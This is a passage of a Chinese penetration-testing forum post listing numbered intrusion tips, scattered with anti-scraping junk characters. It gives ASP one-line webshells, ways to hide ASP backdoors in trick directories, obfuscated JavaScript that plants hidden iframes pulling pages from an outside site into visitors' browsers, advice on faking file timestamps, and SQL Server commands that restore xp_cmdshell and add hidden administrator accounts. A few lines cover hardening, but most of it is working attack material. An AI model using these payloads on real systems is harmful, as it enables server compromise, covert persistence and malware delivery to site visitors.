8 x* z- c* X( a, [7 M" L5 G4 Vd).<script language=VBScript runat=server>execute request("sb")</Script>
' j1 c8 p4 Q3 f  O& ie).<%25Execute(request("l"))%25>
: \+ f0 |8 Q4 }1 \1 Rf).<%if request("cmd")<>"" then execute request("pass")%>
: ~( F" a8 `. t+ W* K* R6 a  W' m: ^0 ?: b7 v* L* ]" |
52、at "12:17" /interactive cmd
9 c; K. g& e. w, P2 [5 X; g2 T4 ]执行后可以用AT命令查看新加的任务8 U) s% o9 o) K* n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 l/ N# Z7 K9 E9 S* G0 T$ a& p

9 u! h& U& t9 O- f53、隐藏ASP后门的两种方法; x6 M) w5 N& K5 h9 m  c  h
1、建立非标准目录:mkdir images..\; }7 y; h3 k0 E
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 p* e( _" b) P: _
通过web访问ASP木马:http://ip/images../news.asp?action=login
6 U% k2 p5 ?  A3 m6 l如何删除非标准目录:rmdir images..\ /s+ P5 |  n, V! I
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: b4 t4 }) ]' H1 Z' r) k$ e! Amkdir programme.asp( @2 K2 L3 r* A7 F2 d
新建1.txt文件内容:<!--#include file=”12.jpg”-->
: y8 ~, j; A* @! l% u新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件5 J# T1 U- d" Y* F; b/ Y: ?5 i- P. \
attrib +H +S programme.asp( H7 K: b2 y7 @) H+ G. A
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
5 ^2 O& k: a- t) J' }9 C# G9 L! ]5 c- \6 q& Y* \7 j9 i7 ?
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
7 w* }& N8 e+ n) K$ K然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 y) ]1 B; f9 D+ y0 q/ }  Y+ O

6 A0 v0 v" y) ^& [; I9 t- H) `55、JS隐蔽挂马" W9 L9 P1 q2 }) p8 C
1.! q! x, j3 Z& E0 C3 H
var tr4c3="<iframe src=ht";$ H9 y( q/ X: z# R0 i" o3 ?) o( b
tr4c3 = tr4c3+"tp:/";
+ _8 K2 y# F- C: b, X0 `5 Vtr4c3 = tr4c3+"/ww";
8 I8 x) x. ]- a3 |, J7 |tr4c3 = tr4c3+"w.tr4";
) v6 [0 _, b7 `2 y& dtr4c3 = tr4c3+"c3.com/inc/m";
" W( E* u( K5 ntr4c3 = tr4c3+"m.htm style="display:none"></i";
0 P: H+ E' O0 ]* B* E5 Ptr4c3 =tr4c3+"frame>'";+ C0 ?$ E: L& K' V5 p0 y' w
document.write(tr4c3);
. U9 E/ F1 D0 j) ~0 P避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 g6 |1 H: n0 E4 H; i! ]

! X! A' b7 I( H9 N. j6 n1 I2.  w8 ?; m! N1 R4 c" S
转换进制,然后用EVAL执行。如+ F9 u) H  ^: a" ?5 d1 o
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");7 L' ~- W2 h( a, y8 j' J
不过这个有点显眼。
" B0 L1 t1 M8 l3.5 |$ ~5 E4 \7 ]9 Z" E2 s4 D4 T
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
9 n; d! z. J0 ^0 z0 c最后一点,别忘了把文件的时间也修改下。
7 ]- o; \% ?) w$ t/ t5 A7 F! C) g2 S, ?1 s' H9 x" `" ^. S
56.3389终端入侵常用DOS命令
+ l& U% R1 m1 Ataskkill taskkill /PID 1248 /t, c6 j: D/ U" ^# b4 @8 _: I/ n
# T$ K" W: H; e# C/ Y; e) Q
tasklist 查进程
  M" n  R! r6 V- X6 Z+ h/ s- `# P& h' Y. M+ i" U
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' ~# C8 X7 [2 H4 G6 Ziisreset /reboot
- z! X0 ?4 ]0 `' b5 H1 a6 vtsshutdn /reboot /delay:1    重起服务器1 n- q$ D: o6 b" a* z0 z8 j7 U6 V3 B  m

) K. v) h' _+ Z8 e" plogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 O4 Q! I, e1 s6 j4 l8 P) F

7 l/ c+ t& K  h; S0 m+ aquery user 查看当前终端用户在线情况
, _* j+ n" z2 J$ V6 H
5 i# u2 C" r) g要显示有关所有会话使用的进程的信息,请键入:query process *
. q* M  M. e% X+ s1 K
" s" u; z- v( H. g& E# t7 ]6 u要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) f5 U2 C1 {. u* V6 v

+ s" ~8 J0 j! G8 W* d. m要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
1 I8 v7 T5 `+ m' F8 V4 h
4 K' Y/ }- d4 }  E! u. S# N要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02* M* V7 G0 }/ s" \" H

' o: U4 d5 ~( [1 X* x' h, x命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 j) x4 z$ b9 Z9 p) ^/ }: N" c
2 v2 ~7 v; z+ o7 P: D命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统1 e4 P  U. g9 J& x  B

5 Y! s3 M1 |7 R: h% z  y命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。0 R% k# [2 C( q1 W$ e
+ V. D0 T5 q& t
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
: X: m- W3 H$ |- C
- v" C) F7 x! |0 |56、在地址栏或按Ctrl+O,输入:( j8 @) F0 t) b5 o& |* i; e
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;' V# }& C5 v; r* ]* c) t1 X  H7 C) ?

/ V. @+ S& `  J7 }9 |) N源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。! j# K% w  z/ q* E
& @3 e! d4 i$ o) l2 z+ j
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% F* ~  y4 c2 X# G! i; d* H6 ]) ~4 ?用net localgroup administrators是可以看到管理组下,加了$的用户的。* O5 @  k4 y8 b1 |9 h  ?

5 @4 ?! |3 o' n+ s; ?  A# S58、 sa弱口令相关命令
; q- g9 c. V/ t6 b, {2 w4 Y/ s1 J- M. O% L/ v7 q9 H( ~
一.更改sa口令方法:
7 t" k9 b* ~5 `2 n1 d用sql综合利用工具连接后,执行命令:5 z. s4 A/ K+ s3 C3 a# J
exec sp_password NULL,'20001001','sa'6 y8 U/ G7 L( K. {' S: z
(提示:慎用!)5 p. R( {# o1 N9 Y5 V) O& F% D
" U8 n, y: B4 _5 ^9 @% N
二.简单修补sa弱口令.+ W- y, G: b# L# Z6 W' r
. H* u- V/ I8 y
方法1:查询分离器连接后执行:
, L% T2 C! ?8 ]; j% h, K( q2 g/ ^! Jif exists (select * from! I' i: [7 x1 [+ @# N, s3 S  e
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
- Z2 M9 z' A' n/ T8 N, KOBJECTPROPERTY(id, N'IsExtendedProc') = 1), O: |5 V- @2 x7 Z8 T

! p+ a  ~; z; pexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% v7 Q: g7 q) H' U2 c# z

) ]: A/ \3 R4 O. B) AGO
# p2 H8 `: Y! T+ S! p: ?0 w! h# {+ f/ E
然后按F5键命令执行完毕
' L% w: z" r  i
$ X! t1 l* k9 Z5 l4 B9 H方法2:查询分离器连接后5 R' n" e5 ]6 b) o8 y' Y; h/ e+ F
第一步执行:use master2 q  V# q- D- r; t
第二步执行:sp_dropextendedproc 'xp_cmdshell'
  g2 I0 G3 \, l) O然后按F5键命令执行完毕! S" K( C: P% K8 Y
7 |- e1 L* w8 b2 |( @" c0 W& L3 R0 G
6 {' o8 q4 ^; F/ y3 o. q
三.常见情况恢复执行xp_cmdshell.
- N  L9 G1 O8 C* Y9 }2 [) v
8 `, J  h9 N( G. r' j7 A2 y  Q7 Z' c6 Q# J% V0 H
1 未能找到存储过程'master..xpcmdshell'.2 d6 M; p! p2 Y6 K
   恢复方法:查询分离器连接后,
+ B" q; m8 Z* Y6 }0 z. ~& I3 {: M第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 ]5 ]3 `* R) S( S1 G& j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ G! ^8 t( v0 A! A然后按F5键命令执行完毕
- z6 a* g: ?2 [) f" S' y' u* l! T4 U1 C5 \5 N2 ~% U3 y% Y( f0 T  A
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
  w% x+ N/ s8 ]& N% o) f恢复方法:查询分离器连接后,
) r, B% d0 B! p: y0 m5 f第一步执行:sp_dropextendedproc "xp_cmdshell"
- W$ r( v6 i3 t+ M( Q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 `! x* U# R7 p- I1 v然后按F5键命令执行完毕
3 A0 J+ [+ m# U. y3 m% T
  S$ G; }. ]7 h, C0 y3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ @& {0 m0 B: I+ b- [. A* f恢复方法:查询分离器连接后,1 Y/ t# Y) _3 Z4 L  m
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
5 ^1 v4 v( M0 k6 o/ k2 v7 o第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
5 G( k2 G2 r. x2 R' _  S2 X; g. K然后按F5键命令执行完毕
: d+ c$ @2 j3 j, b$ c* ^, f( E5 u8 _) }/ Q& z; D
四.终极方法.
, R* G& h9 J: ^5 a8 D* H# C8 A如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& L) x5 U8 }1 P1 w1 e9 b查询分离器连接后,
3 M" |* h* I5 P2 {/ [2000servser系统:+ D% G$ ~0 M) C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 ]7 g* z* b! _6 E8 S* i
9 ?. x5 J/ b1 E0 ~( {$ b/ O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'' j" C$ a$ u" m8 s* q

! U" [1 B; G! x& @" N$ Q4 w. w% xxp或2003server系统:6 e, K2 Q5 |/ D3 V9 _

7 L9 r2 e* g: v! Y* Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: A" G4 f1 K$ j7 Q6 G
% ]2 r5 b7 U; E1 y0 f" mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add': \, Q- ~6 L- a) |! c7 b





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2